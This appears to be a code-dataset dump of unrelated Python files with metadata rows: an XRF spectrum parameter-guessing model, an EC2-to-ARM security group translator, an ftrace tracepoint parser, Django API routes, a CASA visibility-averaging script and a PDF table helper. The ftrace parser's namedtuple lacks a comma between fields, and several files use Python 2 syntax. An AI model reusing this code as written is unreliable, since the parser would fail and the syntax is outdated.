return None
| bsd-3-clause | 3,359,601,575,584,082,400 | 34.779817 | 100 | 0.65641 | false | 4.257642 | false | false | false |
ericdill/PyXRF | pyxrf/model/guessparam.py | 1 | 27631 | # ######################################################################
# Copyright (c) 2014, Brookhaven Science Associates, Brookhaven #
# National Laboratory. All rights reserved. #
# #
# Redistribution and use in source and binary forms, with or without #
# modification, are permitted provided that the following conditions #
# are met: #
# #
# * Redistributions of source code must retain the above copyright #
# notice, this list of conditions and the following disclaimer. #
# #
# * Redistributions in binary form must reproduce the above copyright #
# notice this list of conditions and the following disclaimer in #
# the documentation and/or other materials provided with the #
# distribution. #
# #
# * Neither the name of the Brookhaven Science Associates, Brookhaven #
# National Laboratory nor the names of its contributors may be used #
# to endorse or promote products derived from this software without #
# specific prior written permission. #
# #
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS #
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT #
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS #
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE #
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, #
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES #
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR #
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) #
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, #
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OTHERWISE) ARISING #
# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE #
# POSSIBILITY OF SUCH DAMAGE. #
########################################################################
__author__ = 'Li Li'
import numpy as np
import six
import json
from collections import OrderedDict
import copy
import os
from atom.api import (Atom, Str, observe, Typed,
Int, Dict, List, Float, Enum, Bool)
from skxray.fitting.background import snip_method
from skxray.constants.api import XrfElement as Element
from skxray.fitting.xrf_model import (ModelSpectrum, ParamController,
trim, construct_linear_model, linear_spectrum_fitting)
#from pyxrf.model.fit_spectrum import fit_strategy_list
import logging
logger = logging.getLogger(__name__)
bound_options = ['none', 'lohi', 'fixed', 'lo', 'hi']
fit_strategy_list = ['fit_with_tail', 'free_more',
'e_calibration', 'linear',
'adjust_element1', 'adjust_element2', 'adjust_element3']
class Parameter(Atom):
# todo make sure that these are the only valid bound types
bound_type = Enum(*bound_options)
min = Float(-np.inf)
max = Float(np.inf)
value = Float()
default_value = Float()
fit_with_tail = Enum(*bound_options)
free_more = Enum(*bound_options)
adjust_element1 = Enum(*bound_options)
adjust_element2 = Enum(*bound_options)
adjust_element3 = Enum(*bound_options)
e_calibration = Enum(*bound_options)
linear = Enum(*bound_options)
name = Str()
description = Str()
tool_tip = Str()
@observe('name', 'bound_type', 'min', 'max', 'value', 'default_value')
def update_displayed_name(self, changed):
pass
# print(changed)
def __repr__(self):
return ("Parameter(bound_type={}, min={}, max={}, value={}, "
"default={}, free_more={}, adjust_element1={}, "
"adjust_element2={}, adjust_element3={}, "
"e_calibration={}, linear={}, description={}, "
"toop_tip={}".format(
self.bound_type, self.min, self.max, self.value, self.default_value,
self.free_more, self.adjust_element1, self.adjust_element2,
self.adjust_element3, self.e_calibration,
self.linear, self.description, self.tool_tip))
def to_dict(self):
return {
'bound_type': self.bound_type,
'min': self.min,
'max': self.max,
'value': self.value,
'default_value': self.default_value,
'fit_with_tail': self.fit_with_tail,
'free_more': self.free_more,
'adjust_element1': self.adjust_element1,
'adjust_element2': self.adjust_element2,
'adjust_element3': self.adjust_element3,
'e_calibration': self.e_calibration,
'linear': self.linear,
'name': self.name,
'description': self.description,
'tool_tip': self.tool_tip,
}
def format_dict(parameter_object_dict, element_list):
"""
Format the dictionary that scikit-xray expects.
Parameters
----------
parameter_object_dict : dict
element_list : list
Need to be transferred to str first, then save it to dict
"""
param_dict = {key: value.to_dict() for key, value
in six.iteritems(parameter_object_dict)}
elo = param_dict.pop('energy_bound_low')['value']
ehi = param_dict.pop('energy_bound_high')['value']
non_fitting_values = {'non_fitting_values': {
'energy_bound_low': elo,
'energy_bound_high': ehi,
'element_list': ', '.join(element_list)
}}
param_dict.update(non_fitting_values)
return param_dict
def dict_to_param(param_dict):
"""
Transfer param dict to parameter object.
Parameters
param_dict : dict
fitting parameter
"""
temp_parameters = copy.deepcopy(param_dict)
non_fitting_values = temp_parameters.pop('non_fitting_values')
element_list = non_fitting_values.pop('element_list')
if not isinstance(element_list, list):
element_list = [e.strip(' ') for e in element_list.split(',')]
#self.element_list = element_list
elo = non_fitting_values.pop('energy_bound_low')
ehi = non_fitting_values.pop('energy_bound_high')
param = {
'energy_bound_low': Parameter(value=elo,
default_value=elo,
description='E low limit [keV]'),
'energy_bound_high': Parameter(value=ehi,
default_value=ehi,
description='E high limit [keV]')
}
for param_name, param_dict in six.iteritems(temp_parameters):
if 'default_value' in param_dict:
param.update({param_name: Parameter(**param_dict)})
else:
param.update({
param_name: Parameter(default_value=param_dict['value'],
**param_dict)
})
return element_list, param
class PreFitStatus(Atom):
"""
Data structure for pre fit analysis.
Attributes
----------
z : str
z number of element
spectrum : array
spectrum of given element
status : bool
True as plot is visible
stat_copy : bool
copy of status
maxv : float
max value of a spectrum
norm : float
norm value respect to the strongest peak
lbd_stat : bool
define plotting status under a threshold value
"""
z = Str()
energy = Str()
spectrum = Typed(np.ndarray)
status = Bool(False)
stat_copy = Bool(False)
maxv = Float()
norm = Float()
lbd_stat = Bool(False)
class ElementController(object):
"""
This class performs basic ways to rank elements, show elements,
calculate normed intensity, and etc.
"""
def __init__(self):
self.element_dict = OrderedDict()
def delete_item(self, k):
try:
del self.element_dict[k]
self.update_norm()
logger.info('Item {} is deleted.'.format(k))
except KeyError, e:
logger.info(e)
def order(self, option='z'):
"""
Order dict in different ways.
"""
if option == 'z':
self.element_dict = OrderedDict(sorted(six.iteritems(self.element_dict),
key=lambda t: t[1].z))
elif option == 'energy':
self.element_dict = OrderedDict(sorted(six.iteritems(self.element_dict),
key=lambda t: t[1].energy))
elif option == 'name':
self.element_dict = OrderedDict(sorted(six.iteritems(self.element_dict),
key=lambda t: t[0]))
elif option == 'maxv':
self.element_dict = OrderedDict(sorted(six.iteritems(self.element_dict),
key=lambda t: t[1].maxv, reverse=True))
def add_to_dict(self, dictv):
self.element_dict.update(dictv)
self.update_norm()
def update_norm(self, threshv=0.1):
"""
Calculate the norm intensity for each element peak.
Parameters
----------
threshv : float
No value is shown when smaller than the shreshold value
"""
#max_dict = reduce(max, map(np.max, six.itervalues(self.element_dict)))
max_dict = np.max(np.array([v.maxv for v in six.itervalues(self.element_dict)]))
for v in six.itervalues(self.element_dict):
v.norm = v.maxv/max_dict*100
v.lbd_stat = bool(v.norm > threshv)
def delete_all(self):
self.element_dict.clear()
def get_element_list(self):
current_elements = [v for v in six.iterkeys(self.element_dict) if v.lower() != v]
logger.info('Current Elements for fitting are {}'.format(current_elements))
return current_elements
def update_peak_ratio(self):
"""
In case users change the max value.
"""
for v in six.itervalues(self.element_dict):
v.maxv = np.around(v.maxv, 1)
v.spectrum = v.spectrum*v.maxv/np.max(v.spectrum)
self.update_norm()
def turn_on_all(self, option=True):
"""
Set plotting status on for all lines.
"""
if option:
_plot = option
else:
_plot = False
for v in six.itervalues(self.element_dict):
v.status = _plot
class GuessParamModel(Atom):
"""
This is auto fit model to guess the initial parameters.
Attributes
----------
parameters : `atom.Dict`
A list of `Parameter` objects, subclassed from the `Atom` base class.
These `Parameter` objects hold all relevant xrf information.
data : array
1D array of spectrum
prefit_x : array
xX axis with range defined by low and high limits.
result_dict : dict
Save all the auto fitting results for each element.
It is a dictionary of object PreFitStatus.
param_d : dict
Parameters can be transferred into this dictionary.
param_new : dict
More information are saved, such as element position and width.
total_y : dict
Results from k lines
total_y_l : dict
Results from l lines
total_y_m : dict
Results from l lines
e_list : str
All elements used for fitting.
file_path : str
The path where file is saved.
element_list : list
"""
default_parameters = Dict()
#parameters = Dict() #Typed(OrderedDict) #OrderedDict()
data = Typed(object)
prefit_x = Typed(object)
result_dict = Typed(object) #Typed(OrderedDict)
result_dict_names = List()
#param_d = Dict()
param_new = Dict()
total_y = Dict()
total_y_l = Dict()
total_y_m = Dict()
e_name = Str()
add_element_intensity = Float()
#save_file = Str()
result_folder = Str()
#file_path = Str()
element_list = List()
data_sets = Typed(OrderedDict)
file_opt = Int()
data_all = Typed(np.ndarray)
EC = Typed(object)
def __init__(self, *args, **kwargs):
try:
self.default_parameters = kwargs['default_parameters']
#self.element_list, self.parameters = dict_to_param(self.default_parameters)
self.param_new = copy.deepcopy(self.default_parameters)
self.element_list = get_element(self.param_new)
#self.get_param(default_parameters)
except ValueError:
logger.info('No default parameter files are chosen.')
self.result_folder = kwargs['working_directory']
self.EC = ElementController()
def get_new_param(self, param_path):
"""
Update parameters if new param_path is given.
Parameters
----------
param_path : str
path to save the file
"""
with open(param_path, 'r') as json_data:
self.param_new = json.load(json_data)
#self.element_list, self.parameters = dict_to_param(self.param_new)
self.element_list = get_element(self.param_new)
self.EC.delete_all()
self.create_spectrum_from_file(self.param_new, self.element_list)
logger.info('Elements read from file are: {}'.format(self.element_list))
#self.element_list, self.parameters = self.get_param(new_param)
def create_spectrum_from_file(self, param_dict, elemental_lines):
"""
Create spectrum profile with given param dict from file.
Parameters
----------
param_dict : dict
dict obtained from file
elemental_lines : list
e.g., ['Na_K', Mg_K', 'Pt_M'] refers to the
K lines of Sodium, the K lines of Magnesium, and the M
lines of Platinum
"""
self.prefit_x, pre_dict = calculate_profile(self.data,
param_dict, elemental_lines)
#factor_to_area = factor_height2area()
temp_dict = OrderedDict()
for e in six.iterkeys(pre_dict):
ename = e.split('_')[0]
for k, v in six.iteritems(param_dict):
if ename in k and 'area' in k:
energy = float(get_energy(e))
factor_to_area = factor_height2area(energy, self.param_new)
ratio = v['value']/factor_to_area
spectrum = pre_dict[e] #/ np.max(pre_dict[e]) * ratio
elif ename == 'compton' and k == 'compton_amplitude':
# the rest-mass energy of an electron (511 keV)
mc2 = 511
comp_denom = (1 + self.param_new['coherent_sct_energy']['value']
/ mc2 * (1 - np.cos(np.deg2rad(self.param_new['compton_angle']['value']))))
compton_energy = self.param_new['coherent_sct_energy']['value'] / comp_denom
factor_to_area = factor_height2area(compton_energy, self.param_new,
std_correction=self.param_new['compton_fwhm_corr']['value'])
spectrum = pre_dict[e] #/ np.max(pre_dict[e]) * ratio
elif ename == 'elastic' and k == 'coherent_sct_amplitude':
factor_to_area = factor_height2area(self.param_new['coherent_sct_energy']['value'],
self.param_new)
ratio = v['value']/factor_to_area
spectrum = pre_dict[e] #/ np.max(pre_dict[e]) * ratio
elif ename == 'background':
spectrum = pre_dict[e]
else:
continue
ps = PreFitStatus(z=get_Z(ename), energy=get_energy(e), spectrum=spectrum,
maxv=np.around(np.max(spectrum), 1),
norm=-1, lbd_stat=False)
temp_dict.update({e: ps})
self.EC.add_to_dict(temp_dict)
@observe('file_opt')
def choose_file(self, change):
if self.file_opt == 0:
return
names = self.data_sets.keys()
self.data = self.data_sets[names[self.file_opt-1]].get_sum()
self.data_all = self.data_sets[names[self.file_opt-1]].raw_data
def manual_input(self):
default_area = 1e5
logger.info('Element {} is added'.format(self.e_name))
#param_dict = format_dict(self.parameters, self.element_list)
x, data_out = calculate_profile(self.data, self.param_new,
elemental_lines=[self.e_name], default_area=default_area)
ps = PreFitStatus(z=get_Z(self.e_name), energy=get_energy(self.e_name),
spectrum=data_out[self.e_name]/np.max(data_out[self.e_name])*self.add_element_intensity,
maxv=self.add_element_intensity, norm=-1,
lbd_stat=False)
self.EC.add_to_dict({self.e_name: ps})
def update_name_list(self):
"""
When result_dict_names change, the looper in enaml will update.
"""
# need to clean list first, in order to refresh the list in GUI
self.result_dict_names = []
self.result_dict_names = self.EC.element_dict.keys()
logger.info('Current element names are {}'.format(self.result_dict_names))
def find_peak(self, threshv=0.1):
"""
Run automatic peak finding, and save results as dict of object.
"""
#param_dict = format_dict(self.parameters, self.element_list)
self.prefit_x, out_dict = linear_spectrum_fitting(self.data,
self.param_new)
logger.info('Energy range: {}, {}'.format(self.param_new['non_fitting_values']['energy_bound_low']['value'],
self.param_new['non_fitting_values']['energy_bound_high']['value']))
#max_dict = reduce(max, map(np.max, six.itervalues(out_dict)))
prefit_dict = OrderedDict()
for k, v in six.iteritems(out_dict):
ps = PreFitStatus(z=get_Z(k), energy=get_energy(k), spectrum=v,
maxv=np.around(np.max(v), 1), norm=-1,
lbd_stat=False)
prefit_dict.update({k: ps})
logger.info('The elements from parameter guess: {}'.format(
prefit_dict.keys()))
self.EC.add_to_dict(prefit_dict)
def create_full_param(self, peak_std=0.07):
"""
Extend the param to full param dict with detailed elements
information, and assign initial values from pre fit.
Parameters
----------
peak_std : float
approximated std for element peak.
"""
self.element_list = self.EC.get_element_list()
self.param_new['non_fitting_values']['element_list'] = ', '.join(self.element_list)
#param_d = format_dict(self.parameters, self.element_list)
self.param_new = param_dict_cleaner(self.param_new, self.element_list)
print('element list before register: {}'.format(self.element_list))
# create full parameter list including elements
PC = ParamController(self.param_new, self.element_list)
#PC.create_full_param()
self.param_new = PC.params
# to create full param dict, for GUI only
create_full_dict(self.param_new, fit_strategy_list)
logger.info('full dict: {}'.format(self.param_new.keys()))
logger.info('incident energy: {}'.format(self.param_new['coherent_sct_energy']['value']))
# update according to pre fit results
if len(self.EC.element_dict):
for e in self.element_list:
zname = e.split('_')[0]
for k, v in six.iteritems(self.param_new):
if zname in k and 'area' in k:
factor_to_area = factor_height2area(float(self.EC.element_dict[e].energy),
self.param_new)
v['value'] = self.EC.element_dict[e].maxv * factor_to_area
if 'compton' in self.EC.element_dict:
gauss_factor = 1/(1 + self.param_new['compton_f_step']['value']
+ self.param_new['compton_f_tail']['value']
+ self.param_new['compton_hi_f_tail']['value'])
# the rest-mass energy of an electron (511 keV)
mc2 = 511
comp_denom = (1 + self.param_new['coherent_sct_energy']['value']
/ mc2 * (1 - np.cos(np.deg2rad(self.param_new['compton_angle']['value']))))
compton_energy = self.param_new['coherent_sct_energy']['value'] / comp_denom
factor_to_area = factor_height2area(compton_energy, self.param_new,
std_correction=self.param_new['compton_fwhm_corr']['value'])
self.param_new['compton_amplitude']['value'] = \
self.EC.element_dict['compton'].maxv * factor_to_area
if 'coherent_sct_amplitude' in self.EC.element_dict:
self.param_new['coherent_sct_amplitude']['value'] = np.sum(
self.EC.element_dict['elastic'].spectrum)
def data_for_plot(self):
"""
Save data in terms of K, L, M lines for plot.
"""
self.total_y = {}
self.total_y_l = {}
self.total_y_m = {}
new_dict = {k: v for (k, v) in six.iteritems(self.EC.element_dict) if v.status}
for k, v in six.iteritems(new_dict):
if 'K' in k:
self.total_y[k] = self.EC.element_dict[k].spectrum
elif 'L' in k:
self.total_y_l[k] = self.EC.element_dict[k].spectrum
elif 'M' in k:
self.total_y_m[k] = self.EC.element_dict[k].spectrum
else:
self.total_y[k] = self.EC.element_dict[k].spectrum
def save(self, fname='param_default1.json'):
"""
Save full param dict into a file at result directory.
The name of the file is predefined.
Parameters
----------
fname : str, optional
file name to save updated parameters
"""
fpath = os.path.join(self.result_folder, fname)
with open(fpath, 'w') as outfile:
json.dump(self.param_new, outfile,
sort_keys=True, indent=4)
def read_pre_saved(self, fname='param_default1.json'):
"""This is a bad idea."""
fpath = os.path.join(self.result_folder, fname)
with open(fpath, 'r') as infile:
data = json.load(infile)
return data
def save_as(file_path, data):
"""
Save full param dict into a file.
"""
with open(file_path, 'w') as outfile:
json.dump(data, outfile,
sort_keys=True, indent=4)
def calculate_profile(y0, param,
elemental_lines, default_area=1e5):
# Need to use deepcopy here to avoid unexpected change on parameter dict
fitting_parameters = copy.deepcopy(param)
x0 = np.arange(len(y0))
# ratio to transfer energy value back to channel value
approx_ratio = 100
lowv = fitting_parameters['non_fitting_values']['energy_bound_low']['value'] * approx_ratio
highv = fitting_parameters['non_fitting_values']['energy_bound_high']['value'] * approx_ratio
x, y = trim(x0, y0, lowv, highv)
e_select, matv = construct_linear_model(x, fitting_parameters,
elemental_lines,
default_area=default_area)
non_element = ['compton', 'elastic']
total_list = e_select + non_element
total_list = [str(v) for v in total_list]
temp_d = {k: v for (k, v) in zip(total_list, matv.transpose())}
# get background
bg = snip_method(y, fitting_parameters['e_offset']['value'],
fitting_parameters['e_linear']['value'],
fitting_parameters['e_quadratic']['value'])
temp_d.update(background=bg)
#for i in len(total_list):
# temp_d[total_list[i]] = matv[:, i]
x = (fitting_parameters['e_offset']['value']
+ fitting_parameters['e_linear']['value'] * x
+ fitting_parameters['e_quadratic']['value'] * x**2)
return x, temp_d
def create_full_dict(param, name_list):
"""
Create full param dict so each item has same nested dict.
This is for GUI purpose only.
.. warning :: This function mutates the input values.
Pamameters
----------
param : dict
all parameters including element
name_list : list
strategy names
"""
for n in name_list:
for k, v in six.iteritems(param):
if k == 'non_fitting_values':
continue
if n not in v:
v.update({n: v['bound_type']})
def get_Z(ename):
"""
Return element's Z number.
Parameters
----------
ename : str
element name
Returns
-------
int or None
element Z number
"""
strip_line = lambda ename: ename.split('_')[0]
non_element = ['compton', 'elastic', 'background']
if ename in non_element:
return '-'
else:
e = Element(strip_line(ename))
return str(e.Z)
def get_energy(ename):
strip_line = lambda ename: ename.split('_')[0]
non_element = ['compton', 'elastic', 'background']
if ename in non_element:
return '-'
else:
e = Element(strip_line(ename))
if '_K' in ename:
energy = e.emission_line['ka1']
elif '_L' in ename:
energy = e.emission_line['la1']
elif '_M' in ename:
energy = e.emission_line['ma1']
return str(np.around(energy, 4))
def get_element(param):
element_list = param['non_fitting_values']['element_list']
return [e.strip(' ') for e in element_list.split(',')]
def factor_height2area(energy, param, std_correction=1):
"""
Factor to transfer peak height to area.
"""
temp_val = 2 * np.sqrt(2 * np.log(2))
epsilon = param['non_fitting_values']['electron_hole_energy']
sigma = np.sqrt((param['fwhm_offset']['value'] / temp_val)**2
+ energy * epsilon * param['fwhm_fanoprime']['value'])
return sigma*std_correction
def param_dict_cleaner(param, element_list):
"""
Make sure param only contains element from element_list.
Parameters
----------
param : dict
fitting parameters
element_list : list
list of elemental lines
Returns
-------
dict :
new param dict containing given elements
"""
param_new = {}
for k, v in six.iteritems(param):
if k == 'non_fitting_values' or k == k.lower():
param_new.update({k: v})
else:
if k[:2] in element_list:
param_new.update({k: v})
return param_new | bsd-3-clause | -2,165,580,146,740,394,200 | 36.340541 | 118 | 0.551446 | false | 3.962002 | false | false | false |
aznashwan/heat2arm | heat2arm/translators/networking/secgroups/ec2_secgroup.py | 1 | 3254 | # Copyright 2015 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Contains the definition for the EC2 security group translator.
"""
from heat2arm.translators.networking.secgroups.base_secgroup import (
BaseSecurityGroupARMTranslator
)
class EC2SecurityGroupARMTranslator(BaseSecurityGroupARMTranslator):
""" EC2SecurityGroupARMTranslator is the translator
for EC2 security groups.
"""
heat_resource_type = "AWS::EC2::SecurityGroup"
def _get_rules(self):
""" _get_rules is a helper method which returns a list of all
the resulting ARM security group rules to be created.
"""
i = 0
rules = []
# traverse all ingress rules; if any:
if "SecurityGroupIngress" in self._heat_resource.properties.data:
for in_rule in self._heat_resource.properties.data[
"SecurityGroupIngress"]:
# build the rule:
rule = {
"name": "%s_rule_%d" % (self._name, i),
"properties": {
"protocol": in_rule["IpProtocol"],
"sourcePortRange": in_rule["FromPort"],
"destinationPortRange": in_rule["ToPort"],
"sourceAddressPrefix": in_rule["CidrIp"],
"destinationAddressPrefix": "*",
"direction": "Inbound",
"access": "Allow",
# NOTE: priority is always fixed.
"priority": 100 + i,
}
}
i = i + 1
rules.append(rule)
# traverse all egress rules; if any:
if "SecurityGroupEgress" in self._heat_resource.properties.data:
for out_rule in self._heat_resource.properties.data[
"SecurityGroupEgress"]:
# build the rule:
rule = {
"name": "%s_rule_%d" % (self._name, i),
"properties": {
"protocol": out_rule["IpProtocol"],
"sourcePortRange": out_rule["FromPort"],
"destinationPortRange": out_rule["ToPort"],
"sourceAddressPrefix": out_rule["CidrIp"],
"destinationAddressPrefix": "*",
"direction": "Outbound",
"access": "Allow",
# NOTE: priority is always fixed.
"priority": 100 + i,
}
}
i = i + 1
rules.append(rule)
return rules
| apache-2.0 | -445,866,815,154,035,600 | 37.738095 | 78 | 0.527966 | false | 4.750365 | false | false | false |
corakwue/ftrace | ftrace/parsers/sched_load_avg_cpu.py | 1 | 2005 | #!/usr/bin/python
# Copyright 2015 Huawei Devices USA Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Authors:
# Chuk Orakwue <[email protected]>
import re
from ftrace.common import ParserError
from .register import register_parser
try:
from ftrace.third_party.cnamedtuple import namedtuple
except ImportError:
from collections import namedtuple
TRACEPOINT = 'sched_load_avg_cpu'
__all__ = [TRACEPOINT]
SchedLoadAvgCpuBase = namedtuple(TRACEPOINT,
[
'cpu'
'load_avg',
'util_avg'
]
)
class SchedLoadAvgCpu(SchedLoadAvgCpuBase):
__slots__ = ()
def __new__(cls, cpu, load_avg, util_avg):
cpu = int(cpu)
load_avg = int(load_avg)
util_avg = int(util_avg)
return super(cls, SchedLoadAvgCpu).__new__(
cls,
cpu=cpu,
load_avg=load_avg,
util_avg=util_avg,
)
sched_load_avg_cpu_pattern = re.compile(
r"""
cpu=(?P<cpu>\d+)\s+
load_avg=(?P<load_avg>\d+)\s+
util_avg=(?P<util_avg>\d+)
""",
re.X|re.M
)
@register_parser
def sched_load_avg_cpu(payload):
"""Parser for `sched_load_avg_cpu` tracepoint"""
try:
match = re.match(sched_load_avg_cpu_pattern, payload)
if match:
match_group_dict = match.groupdict()
return SchedLoadAvgCpu(**match_group_dict)
except Exception, e:
raise ParserError(e.message)
| apache-2.0 | 1,968,760,944,318,342,700 | 26.094595 | 74 | 0.632918 | false | 3.523726 | false | false | false |
grepme/cmput410-project | api/urls.py | 1 | 1779 | from django.conf.urls import patterns, include, url
guid_regex = "[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}"
sha1_regex = "[a-zA-Z0-9]+"
id_regex = "(({guid})|({sha1}))".format(guid=guid_regex,sha1=sha1_regex)
urlpatterns = patterns('api.views',
# get posts by a specific author that the current authenticated user
# can view
# author/id1/posts
# /api/author/ef3e0e05-c5f8-11e4-a972-b8f6b116b2b7/posts/
(r'^author/(?:(?P<author_id>{})/?)?posts/?(?:/(?P<page>\d*)/?)?$'.format(id_regex), 'get_posts'),
# Get a specific post or all public posts
(r'^posts/?(?:(?P<post_id>{}))?/?$'.format(id_regex), 'get_post'),
#See if a author_id is a friend with author_2_id
(r'^friends/(?P<author_id>{0})/(?P<author_2_id>{0})/?$'.format(id_regex), 'is_friend'),
# POST authors, returns list of friends in the list
(r'^friends/(?P<author_id>{})/?$'.format(id_regex), 'get_friends'),
# GET authors on our server
(r'^author$', 'get_authors'),
# GET author on our server
(r'^author/(?P<profile_id>{})/?$'.format(id_regex), 'get_author'),
# Make a friend request with another user
(r'^friendrequest$', 'friend_request'),
# Follow a specific user
(r'^follow$', 'follow_user'),
# search for a user
#(r'search/(?P<name>([a-zA-Z0-9 -._~:?#%]+))/?$', 'search_users'),
)
| apache-2.0 | -7,852,624,737,404,225,000 | 44.615385 | 121 | 0.45756 | false | 3.414587 | false | false | false |
jspilker/visilens | examples/Ex1_get_data_continuum.py | 1 | 4773 | """
Example 1, to be run within CASA. This script serves as a guideline
for how to get data out of a CASA ms and into a format which
visilens can use. We really don't need all that much information,
so we keep only the columns we need.
To keep the number of visibilities low, we first average the data
a bit. In this particular case, the on-source integration times were
only ~60s, so we won't average in time. We will average down each of
the four ALMA basebands (spectral windows), since this is continuum
data and the fractional bandwidth from the lowest to highest observed
frequency is small. We'll also average the two orthogonal polarizations,
since the source is unpolarized. Last, for fitting, we need an
accurate estimate of the uncertainty on each visibility. The *relative*
uncertainties in the data are okay, but they're not on any absolute scale,
so we need to calculate what the re-scaling factor should be. To do this,
we take the difference between successive visibilities on each baseline
(these are strong sources, so unfortunately we can't just use the rms)
and re-scale the noise to match. In principle CASA's statwt also does
this, but I found that it sometimes gave bizarre results (some baselines
weighted 100x more than others for no obvious reason, etc.). If you
have better luck with it, feel free to use that instead!
"""
import numpy as np
import os
c = 299792458.0 # in m/s
# Path to the calibrated ms file, and the source name we want.
inms = 'Compact_0202_to_0418.cal.ms'
field = 'SPT0202-61'
spw = '0,1,2,3'
# First we split out just the source we want from our ms file.
outms = field+'_'+inms[:3].lower()+'.ms'
os.system('rm -rf '+outms)
split(inms,outms,field=field,spw=spw,width=128,datacolumn='corrected',
keepflags=False)
# Now we'll get the visibility columns we need, before manipulating them.
# data_desc_id is a proxy for the spw number.
ms.open(outms,nomodify=True)
visdata = ms.getdata(['uvw','antenna1','antenna2','data','sigma','data_desc_id'])
visdata['data'] = np.squeeze(visdata['data']) # ditch unnecessary extra dimension
ms.close()
# Get the frequencies associated with each spw, because uvw coordinates are in m
tb.open(outms+'/SPECTRAL_WINDOW')
freqs = np.squeeze(tb.getcol('CHAN_FREQ')) # center freq of each spw
tb.close()
# Get the primary beam size from the antenna diameter. Assumes homogeneous array,
# sorry CARMA users.
tb.open(outms+'/ANTENNA')
diam = np.squeeze(tb.getcol('DISH_DIAMETER'))[0]
PBfwhm = 1.2*(c/np.mean(freqs))/diam * (3600*180/np.pi) # in arcsec
tb.close()
# Data and sigma have both polarizations; average them
visdata['data'] = np.average(visdata['data'],weights=(visdata['sigma']**-2.),axis=0)
visdata['sigma']= np.sum((visdata['sigma']**-2.),axis=0)**-0.5
# Convert uvw coords from m to lambda
for ispw in range(len(spw.split(','))):
visdata['uvw'][:,visdata['data_desc_id']==ispw] *= freqs[ispw]/c
# Calculate the noise re-scaling, by differencing consecutive visibilities on the
# same baseline. Have to do an ugly double-loop here; would work better if we knew
# in advance how the data were ordered (eg time-sorted). We assume that we can
# re-scale the noise using the mean of the re-scalings from each baseline.
facs = []
for ant1 in np.unique(visdata['antenna1']):
for ant2 in np.unique(visdata['antenna2']):
if ant1 < ant2:
thisbase = (visdata['antenna1']==ant1) & (visdata['antenna2']==ant2)
reals = visdata['data'].real[thisbase]
imags = visdata['data'].imag[thisbase]
sigs = visdata['sigma'][thisbase]
diffrs = reals - np.roll(reals,-1); diffis = imags - np.roll(imags,-1)
std = np.mean([diffrs.std(),diffis.std()])
facs.append(std/sigs.mean()/np.sqrt(2))
facs = np.asarray(facs); visdata['sigma'] *= facs.mean()
print outms, '| mean rescaling factor: ',facs.mean(), '| rms/beam (mJy): ',1000*((visdata['sigma']**-2).sum())**-0.5
# If we ever want to mess with the data after re-scaling the weights, we have to
# write them back to the ms file. But, CASA doesn't like that we've averaged
# the polarizations together, so we have to keep them separate for this purpose.
ms.open(outms,nomodify=False)
replace = ms.getdata(['sigma','weight'])
replace['sigma'] *= facs.mean()
replace['weight'] = replace['sigma']**-2.
ms.putdata(replace)
ms.close()
# Create one single array of all this data, then save everything.
allarr = np.vstack((visdata['uvw'][0,:],visdata['uvw'][1,:],visdata['data'].real,
visdata['data'].imag,visdata['sigma'],visdata['antenna1'],visdata['antenna2']))
outfname = field+'_'+inms[:3].lower()+'.bin'
with open(outfname,'wb')as f:
allarr.tofile(f)
f.write(PBfwhm)
| mit | 5,476,157,098,352,860,000 | 44.457143 | 116 | 0.699979 | false | 3.229364 | false | false | false |
bbondy/brianbondy.gae | libs/sx/pisa3/pisa_tables.py | 1 | 13877 | # -*- coding: ISO-8859-1 -*-
# Copyright 2010 Dirk Holtwick, holtwick.it
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__reversion__ = "$Revision: 20 $"
__author__ = "$Author: holtwick $"
__date__ = "$Date: 2007-10-09 12:58:24 +0200 (Di, 09 Okt 2007) $"
from pisa_tags import pisaTag
from pisa_util import *
from pisa_reportlab import PmlTable, TableStyle, PmlKeepInFrame
import copy
import sys
import logging
log = logging.getLogger("ho.pisa")
def _width(value=None):
if value is None:
return None
value = str(value)
if value.endswith("%"):
return value
return getSize(value)
class TableData:
def __init__(self):
self.data = []
self.styles = []
self.span = []
self.mode = ""
self.padding = 0
self.col = 0
# self.c = None
def add_cell(self, data=None):
self.col += 1
self.data[len(self.data) - 1].append(data)
def add_style(self, data):
# print self.mode, data
# Do we have color and
# width = data[3]
#if data[0].startswith("LINE"):
# color = data[4]
# if color is None:
# return
self.styles.append(copy.copy(data))
